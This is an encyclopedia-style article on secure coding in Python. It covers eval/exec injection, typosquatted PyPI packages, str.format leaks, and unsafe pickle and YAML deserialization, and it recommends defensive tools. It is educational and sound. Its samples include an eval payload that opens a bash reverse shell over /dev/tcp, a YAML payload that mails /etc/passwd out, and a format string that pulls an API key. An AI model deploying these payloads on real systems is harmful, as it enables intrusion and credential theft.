• Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.
    Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.
  • Malicious packages found on PyPI via static analysis. Source: Bertus 2018.
    Malicious packages found on PyPI via static analysis. Source: Bertus 2018.
  • Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.
    Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.
  • Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.
    Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.
  • Python2's input() is problematic. Source: Branca 2014, slide 28.
    Python2's input() is problematic. Source: Branca 2014, slide 28.
  • Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.
    Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.
  • An example exploit of pickle. Source: Branca 2014, slide 33.
    An example exploit of pickle. Source: Branca 2014, slide 33.

Secure Coding with Python

User avatar
sangeetha-prabhu
1294 DevCoins
Avatar of user arvindpdmn
arvindpdmn
14 DevCoins
2 authors have contributed to this article
Last updated by sangeetha-prabhu
on 2020-08-11 03:30:08
Created by arvindpdmn
on 2019-01-03 16:31:53

Summary

Writing secure code is essential for protecting sensitive data and maintaining correct behaviour of applications. This is more relevant today when most applications connect to the web, exchange data and even update themselves. While security considerations and best practices are typically language agnostic, in this article we focus on Python-specific issues.

OWASP's Python Security project has identified three angles: Security in Python (white-box analysis, functional analysis), Security of Python (black-box analysis), and Security with Python (develop security-hardened Python).

While some vulnerabilities are due to the way Python modules and functions behave, others are due to the manner in which third-party packages are distributed. Since Python is an open developer ecosystem, anyone can share their own packages that others can use in their projects. However, this opens up a security risk that developers need to be aware of.

Milestones

Dec
2008

Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format() method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.

Jul
2011
Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.

Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits such as retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or create a DoS attacks.

Dec
2016

Python 3.6.0 is released. This release includes the secrets module that's documented in PEP 506. Python's existing random module is not suited for security purposes. Though documentation makes this clear, many implementations are seen to ignore this warning. To solve this problem, secrets module includes ready-to-use functions for managing passwords, tokens and other secrets.

Oct
2018
Malicious packages found on PyPI via static analysis. Source: Bertus 2018.

Bertus, a software security engineer, creates a static analysis tool to automatically detect if a package published on PyPI is malicious. From a scan of 123,000 packages, he identifies about a dozen such packages containing various exploits.

Nov
2019
Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.

Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding becomes available only recently. The idea of this proposal is that authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys managed by PyPI. This is called minimum security model. This PEP doesn't address the maximum security model in which authors can sign the packages.

Dec
2019

German software developer Lukas Martini finds two packages on PyPI that are doing typosquatting. These are python3-dateutil (impersonating dateutil) and jeIlyfish (impersonating jellyfish). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish downloads a file, decodes that into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.

Aug
2020
Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.

Facebook open sources Pysa, a static analysis code to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker tool. Pysa tracks data flows. Developers define sources where data originates and sinks where data shouldn't end up. It warns when data reaches a sink. It has techniques to mitigate false positives and false negatives.

Discussion

  • What are some guidelines for writing more secure Python code?
    Python2's input() is problematic. Source: Branca 2014, slide 28.
    Python2's input() is problematic. Source: Branca 2014, slide 28.

    It's essential to validate user input. If not, an attacker could execute arbitrary code. Python functions eval(), exec(), input(), popen(), subprocess() and os.system() are dangerous in this regard. These could be used to bypass authentication or inject code. For example, Python2's input() could be exploited. An input of passwd to the statement if passwd == input("Please enter your password"): would bypass authentication.

    Databases are also vulnerable to inputs. Commonly called SQL injection, using inputs directly in database commands is dangerous. Instead, validate the inputs and query databases via an ORM. Among the well-known Python ORMs are Django ORM, SQLAlchemy and Peewee.

    Python assert statement must be used only on invariants for debugging. Using them for authentication (such as assert user.is_admin, "user does not have access") is wrong. Often on production servers, __debug__ == False and assert statements won't work.

    To create temporary files, avoid the deprecated tempfile.mktemp() function. In general, keep your Python distribution and the packages you use up to date. For example, earlier CPython implementations of Python had memory overflow errors that could be exploited for arbitrary code execution.

  • How should I manage Python dependencies for a more secure application?
    Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.
    Process flow of a typosquatting attack on PyPI. Source: Bertus 2018.

    PyPI is the repository from where third-party Python packages can be downloaded and installed if required by your project. Direct dependencies may have further dependencies. Any of these could have malicious code.

    It's easy to create a malicious package based on a well-known package since the original code is open source and easily copied. Often these packages behave normally since the malicious code only resides in setup.py that executes once during installation. This is enough to install software that can later steal data or monitor behaviour. Some attacks modify the original code, for example, to steal SSH credentials.

    Developers can be tricked into installing the wrong package by a slight modification of the original package name. This is called typosquatting. There are plenty of examples: acqusition impersonates acquisition; bzip impersonates bz2file; crypt impersonates crypto; setup-tools impersonates setuptools; urlib3 impersonates urllib3; diango impersonates django.

    PEP458 proposes signing a package. However, this only verifies its author's identity. Instead, a combination of dynamic analysis (within a sandbox) and static analysis can be used to catch malicious packages.

  • What security risks do Python strings pose if used improperly?

    Python3 introduced str.format() as a more powerful and flexible way to format strings. This method is called on a format string and it accepts Python objects as arguments. The problem is that attributes of these arguments can be accessed from within the format string. If the application allows users control of the format string, they can be misused to leak sensitive data.

    There are a few cases where such control may be common. Applications that are translated into multiple languages may use untrusted translators who may be given control of the format string. Some applications may permit users to configure behaviour that might be exposed as format strings.

    An example exploit is the code "{person.__init__.__globals__[CONFIG][API_KEY]}".format(person), where sensitive global data from a CONFIG dictionary is being accessed via the argument.

    We can overcome this by validating the format string. One approach is shown by Armin Ronacher who subclasses Formatter and Mapping, makes use of formatter_field_name_split and throws an AttributeError if unsafe formats are detected.

  • What's a secure way to do data deserialization in Python?
    An example exploit of pickle. Source: Branca 2014, slide 33.
    An example exploit of pickle. Source: Branca 2014, slide 33.

    Deserialization recreates Python objects by reading its representation from disk or network interface. It's possible to deserialize malicious data and thereby execute arbitrary code in your system. This is because objects are not just values. They contain constructors and methods that are executable code.

    For example, a web application could store user information in a cookie that's formed using cPickles or pickle module. The object's __reduce__ method could be modified to contain malicious code. This method would be called during deserialization. A better approach would be to use json.loads(). If cPickles is used, verify the payload integrity using cryptographic signatures. PyCrypto is a useful package for this.

    Another serialization format is YAML. YAML files can represent Python objects. Like pickle, it's possible to modify them to bypass authentication or execute arbitrary code. For example, configuration files in Ansible are YAML files. The following code obtains passwords and emails the same to the hacker's address: !!python/object/apply:os.system ["cat /etc/passwd | mail This email address is being protected from spambots. You need JavaScript enabled to view it."]. Essentially, it's unwise to deserialize from an untrusted source. A safer alternative is to use yaml.safe_load() rather than yaml.load().

  • What are some resources for Python developers to create more secure code?

    Python core modules that can help developers build security features include hashlib, hmac and secrets. For passwords and security tokens, secrets must be preferred over random. Functions hmac.compare_digest() and secrets.compare_digest() are designed to mitigate timing attacks.

    Bandit is a useful static linter that can alert developers to common security issues in code. Another static analyzer, open sourced by Facebook, is Pysa. To audit installed packages and their versions, use a tool such as Chef InSpec. PyUp tracks thousands of Python packages for vulnerabilities and makes pull requests to your codebase automatically when there are updates.

    Python Security is an OWASP project aimed at creating a security-hardened version of Python. Their page on security concerns in modules and functions is worth reading. They've also curated a list of Python libraries for security applications.

    Some Python Enhancement Proposals (PEPs) specific to security are worth reading for in-depth understanding. Among them are PEP458, PEP506, PEP551, and PEP578.

Sample Code

  • # Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
    # Accessed: 2020-03-21
     
    # --------------------------------------------------
    # Exploit of eval()
    def addition(a, b):
      return eval("%s + %s" % (a, b))
     
    # Such an input might be a JSON response to a network request
    userinput = {
      "a": "__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#",
      "b": "2"
    }
    result = addition(userinput['a'], userinput['b'])
    print("The result is %d." % result)
     
     
    # --------------------------------------------------
    # Exploit of exec()
    # Can be exploited in the same way as eval()
    def addition(a, b):
      return exec("%s + %s" % (a, b))
     
     
    # --------------------------------------------------
    # Bypass authentication in Python2's input()
    # Python3's input() will convert input to a string and is therefore safer
    user_pass = get_user_pass("admin")
    if user_pass == input("Please enter your password"):
      login()
    else:
      print "Password is incorrect!"
     
    # Bypass authentication if user enters 'user_pass'
    # if user_pass == user_pass: // this will evaluate as true

References

  1. Bertus. 2018. "Detecting Cyber Attacks in the Python Package Index (PyPI)." Medium, October 13. Accessed 2020-03-20.
  2. Bleaney, Graham and Sinan Cepel. 2020. "Pysa: An open source static analysis tool to detect and prevent security issues in Python code." Blog, Facebook Engineering, August 7. Accessed 2020-08-11.
  3. Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
  4. Chef InSpec Docs. 2020. "pip." Chef InSpec Docs, v4.18.100. Accessed 2020-03-21.
  5. Cimpanu, Catalin. 2017. "Ten Malicious Libraries Found on PyPI - Python Package Index." BleepingComputer, September 15. Accessed 2020-03-20.
  6. Cimpanu, Catalin. 2018. "Twelve malicious Python libraries found and removed from PyPI." ZDNet, October 27. Accessed 2020-03-20.
  7. Cimpanu, Catalin. 2019. "Two malicious Python libraries caught stealing SSH and GPG keys." ZDNet, December 4. Accessed 2020-03-20.
  8. D'Aprano, Steven. 2015. "PEP 506 -- Adding A Secrets Module To The Standard Library." Python.org, September 19. Accessed 2020-03-20.
  9. Franklin Jr, Curtis. 2019. "Malware in PyPI Code Shows Supply Chain Risks." Dark Reading, July 19. Accessed 2020-03-20.
  10. Kuppusamy, Trishank Karthik, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, and Justin Cappos. 2013. "PEP 458 -- Secure PyPI downloads with signed repository metadata." Python.org, September 27. Updated 2019-11-13. Accessed 2020-03-20.
  11. Leblanc, Maxime. 2018. "Rotten pickles: A quick introduction to offensive serialization techniques." poka-techblog, on Medium, March 13. Accessed 2020-03-20.
  12. Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
  13. Makai, Matt. 2020. "Object-relational Mappers (ORMs)." Full Stack Python. Accessed 2020-03-21.
  14. Mavituna, Ferruh. 2015. "SQL Injection Cheat Sheet." Blog, Netsparker, October 21. Updated 2019-08-26. "Accessed 2020-03-20.
  15. National Security Authority. 2017. "skcsirt-sa-20170909-pypi." SK-CSIRT advisory, National Security Authority, Slovak Republic, September 09. Updated 2017-09-21. Accessed 2020-03-20.
  16. OWASP Python Security. 2020a. "OWASP Python Security Project." Accessed 2020-03-20.
  17. OWASP Python Security. 2020b. "Libraries." Accessed 2020-03-20.
  18. PyYAML Wiki. 2020. "PyYAML Documentation." Accessed 2020-03-21.
  19. Python. 2008. "What's New In Python 3.0." Python.org. Accessed 2020-03-21.
  20. Python. 2016. "Python 3.6.0." Python.org. Accessed 2020-03-21.
  21. Python. 2020. "Search Python.org: 'security PEP'." Accessed 2020-03-21.
  22. Python Docs. 2020a. "The Python Standard Library." v3.8.2, March 21. Accessed 2020-03-21.
  23. Python Docs. 2020b. "secrets — Generate secure random numbers for managing secrets." The Python Standard Library, v3.8.2, March 21. Accessed 2020-03-21.
  24. Python Docs. 2020c. "Input and Output." The Python Tutorial, v3.8.2, March 20. Accessed 2020-03-20.
  25. Ronacher, Armin. 2016. "Be Careful with Python's New-Style String Format." Blog, December 29. Accessed 2020-03-20.
  26. Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
  27. Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
  28. Talin. 2006. "PEP 3101 -- Advanced String Formatting." Python.org, April 16. Updated 2008-09-14. Accessed 2020-03-21.
  29. Viter, Alexander. 2018. "How to write secure code in Python." Blog, CheckiO, August 22. Accessed 2020-03-20.

Milestones

Dec
2008

Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format() method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.

Jul
2011
Different approaches to modify a pickle stream. Source: Slaviero 2011, fig. 3.

Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits such as retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or create a DoS attacks.

Dec
2016

Python 3.6.0 is released. This release includes the secrets module that's documented in PEP 506. Python's existing random module is not suited for security purposes. Though documentation makes this clear, many implementations are seen to ignore this warning. To solve this problem, secrets module includes ready-to-use functions for managing passwords, tokens and other secrets.

Oct
2018
Malicious packages found on PyPI via static analysis. Source: Bertus 2018.

Bertus, a software security engineer, creates a static analysis tool to automatically detect if a package published on PyPI is malicious. From a scan of 123,000 packages, he identifies about a dozen such packages containing various exploits.

Nov
2019
Overview of role metadata on PyPI. Source: Kuppusamy et al. 2013, fig. 1.

Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding becomes available only recently. The idea of this proposal is that authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys managed by PyPI. This is called minimum security model. This PEP doesn't address the maximum security model in which authors can sign the packages.

Dec
2019

German software developer Lukas Martini finds two packages on PyPI that are doing typosquatting. These are python3-dateutil (impersonating dateutil) and jeIlyfish (impersonating jellyfish). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish downloads a file, decodes that into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.

Aug
2020
Pysa tracks data flows through the program. Source: Bleaney and Cepel 2020.

Facebook open sources Pysa, a static analysis code to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker tool. Pysa tracks data flows. Developers define sources where data originates and sinks where data shouldn't end up. It warns when data reaches a sink. It has techniques to mitigate false positives and false negatives.

Tags

See Also

Further Reading

  1. Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
  2. Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
  3. Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
  4. Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
  5. Denbraver, Hayley and Kenneth Reitz. 2019. "Python Security Best Practices Cheat Sheet." Blog, Synk, February 28. Accessed 2020-03-20.

Article Stats

Author-wise Stats for Article Edits

Author
No. of Edits
No. of Chats
DevCoins
3
0
1294
2
1
14
1555
Words
2
Chats
5
Edits
0
Likes
2043
Hits

Cite As

Devopedia. 2020. "Secure Coding with Python." Version 5, August 11. Accessed 2020-10-21. https://devopedia.org/secure-coding-with-python